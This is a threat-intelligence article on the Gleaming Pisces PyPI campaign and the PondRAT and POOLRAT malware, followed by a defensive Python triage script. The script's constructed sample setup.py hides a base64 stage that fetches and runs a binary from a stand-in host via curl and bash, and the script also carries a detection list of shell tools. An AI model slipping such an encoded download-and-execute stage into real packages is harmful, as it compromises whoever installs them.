Gleaming Pisces, a North Korean threat actor, has been active since 2018, targeting the cryptocurrency industry by using fake trading software to infiltrate systems and deploy malware like PondRAT.
This RAT shares similarities with previous Gleaming Pisces malware, including AppleJeus and POOLRAT, indicating a shared codebase. The recent poisoned Python packages campaign, which delivered PondRAT, is attributed to Gleaming Pisces based on these findings.
The poisoned Python packages real-ids, coloredtxt, beautifultext, and minisound, uploaded to PyPI by Gleaming Pisces, implemented an evasive infection chain. After installation, these packages executed encoded code that eventually ran bash commands to download and execute the Linux RAT PondRAT.
The packages were part of a larger campaign targeting both Linux and macOS systems; the analysis found strong similarities between PondRAT and previously attributed Gleaming Pisces malware such as POOLRAT, pointing to a consistent modus operandi.
The VIPYR Security analysis reveals striking code similarities between the Linux variant of PondRAT and the kupayupdate_stage2 macOS RAT. Both malware variants exhibit identical function names, notably FConnectProxy and AcceptRequest, and share a similar code execution flow.
Their AcceptRequest functions use the same numerical command IDs and nearly identical method names, which strongly suggests a shared codebase or direct derivation and, by extension, a connection between the developers or operators of the two malware families.
The analysis by Unit 42 revealed a shared encryption key between multiple PondRAT variants, including macOS and Linux versions, which was also used in kupayupdate_stage2.
One macOS variant, “os_helper,” was found to be part of the poisoned Python packages campaign and shared the same C2 infrastructure as the Linux variant.
Another macOS variant was linked to the AppleJeus campaign, which solidifies the attribution of these campaigns to Gleaming Pisces, a threat actor group.
Researchers also discovered new Linux variants of POOLRAT, previously known only as a macOS RAT. They share several key traits with the macOS version: identical function structures for loading the configuration, similar function names and functionality, and nearly identical command handling mechanisms.
This suggests the Linux builds are ports of the original macOS malware, with only platform-specific differences: the Linux variant uses libcurl for C2 communication and writes error messages to /tmp/xweb_log.md, where the macOS version relies on different mechanisms.
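The infection chain described above (a PyPI package whose install code runs an encoded stage that ends in bash commands) and the Linux artifact mentioned here (the /tmp/xweb_log.md error log) both lend themselves to a quick triage check. The following script is an added example written for this article, not code from Unit 42, VIPYR Security, or the malware itself. It checks whether any of the four named packages is installed, looks for the reported log path, and scans package source for long base64 literals that decode to shell-execution code. The sample setup.py, the 203.0.113.10 address, and the decode-then-execute heuristics are constructed for illustration and are not indicators from the article.

```python
"""Triage helper for the poisoned-PyPI / PondRAT infection chain (added example)."""
import base64
import re
from importlib.metadata import distributions
from pathlib import Path
from typing import Iterable

# Package names reported in the article (PyPI names compare case- and separator-insensitively).
POISONED_PACKAGES = {"real-ids", "coloredtxt", "beautifultext", "minisound"}

# Error-log path the Linux POOLRAT variant is reported to write to.
POOLRAT_LOG_PATH = Path("/tmp/xweb_log.md")

# Heuristics (assumptions of this example, not signatures from the article): a string literal that
# looks like a long base64 blob, plus calls that execute code or spawn a shell.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")
EXEC_CALLS = re.compile(r"\b(exec|eval|os\.system|subprocess\.(?:run|call|Popen|check_output))\s*\(")
SHELL_INDICATORS = ("bash", "/bin/sh", "curl ", "wget ", "chmod +x", "/tmp/")


def normalize(name: str) -> str:
    """PEP 503 name normalisation so 'Real_IDs' and 'real-ids' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_poisoned_installs(installed_names: Iterable[str]) -> set[str]:
    """Return the installed distribution names that match the reported poisoned packages."""
    wanted = {normalize(n) for n in POISONED_PACKAGES}
    return {n for n in installed_names if normalize(n) in wanted}


def check_host_artifacts(paths: Iterable[Path] = (POOLRAT_LOG_PATH,)) -> list[str]:
    """Return the reported on-disk artifacts that exist on this host."""
    return [str(p) for p in paths if p.exists()]


def decode_layers(blob: str, max_depth: int = 3) -> str:
    """Peel up to max_depth layers of base64 that decode to UTF-8 text; return the innermost text."""
    text = blob
    for _ in range(max_depth):
        try:
            text = base64.b64decode(text, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            break
    return text


def scan_source(source: str) -> dict:
    """Flag install code that executes something and hides a shell command inside a base64 literal."""
    exec_calls = {m.group(1) for m in EXEC_CALLS.finditer(source)}
    decoded_payloads: list[str] = []
    shell_indicators: list[str] = []
    for m in B64_LITERAL.finditer(source):
        decoded = decode_layers(m.group(1))
        if decoded == m.group(1):
            continue  # literal did not decode to text; not a hidden stage
        decoded_payloads.append(decoded)
        exec_calls.update(c.group(1) for c in EXEC_CALLS.finditer(decoded))
        shell_indicators.extend(i for i in SHELL_INDICATORS if i in decoded)
    return {
        "exec_calls": sorted(exec_calls),
        "decoded_payloads": decoded_payloads,
        "shell_indicators": shell_indicators,
        "suspicious": bool(exec_calls) and bool(shell_indicators),
    }


# Constructed sample: a setup.py whose install code exec()s a base64 stage that drops and runs a
# binary via bash. The URL uses a TEST-NET address and is not an indicator from the article.
INNER_STAGE = (
    "import os\n"
    "os.system(\"bash -c 'curl -fsSL http://203.0.113.10/update -o /tmp/.cache && "
    "chmod +x /tmp/.cache && /tmp/.cache'\")\n"
)
ENCODED_STAGE = base64.b64encode(INNER_STAGE.encode()).decode()
SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "import base64\n"
    f'exec(base64.b64decode("{ENCODED_STAGE}"))\n'
    'setup(name="coloredtxt", version="0.1.0")\n'
)


if __name__ == "__main__":
    names = [d.metadata["Name"] or "" for d in distributions()]
    print("poisoned packages installed:", find_poisoned_installs(names) or "none")
    print("reported host artifacts present:", check_host_artifacts() or "none")
    print("sample setup.py scan:", scan_source(SAMPLE_SETUP_PY))
```

To inspect a real package rather than the embedded sample, pass the contents of its setup.py or top-level __init__.py to scan_source; a "suspicious" result means an exec-style call plus a base64 literal that decodes to shell commands, which is the shape of the chain described above and is worth a manual look, not proof of compromise on its own.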
PondRAT, the Linux malware associated with the North Korean Gleaming Pisces group, is a simplified version of POOLRAT. Both share similar core capabilities, but PondRAT exposes a more limited command set covering file upload and download, status checks, command execution, and configuration management.
Despite its reduced functionality, PondRAT's delivery through malicious packages published to PyPI poses a significant threat to organizations: because the payload runs as part of an ordinary package installation, it can evade detection mechanisms focused on conventional malware delivery and serve as a foothold for wider network compromise.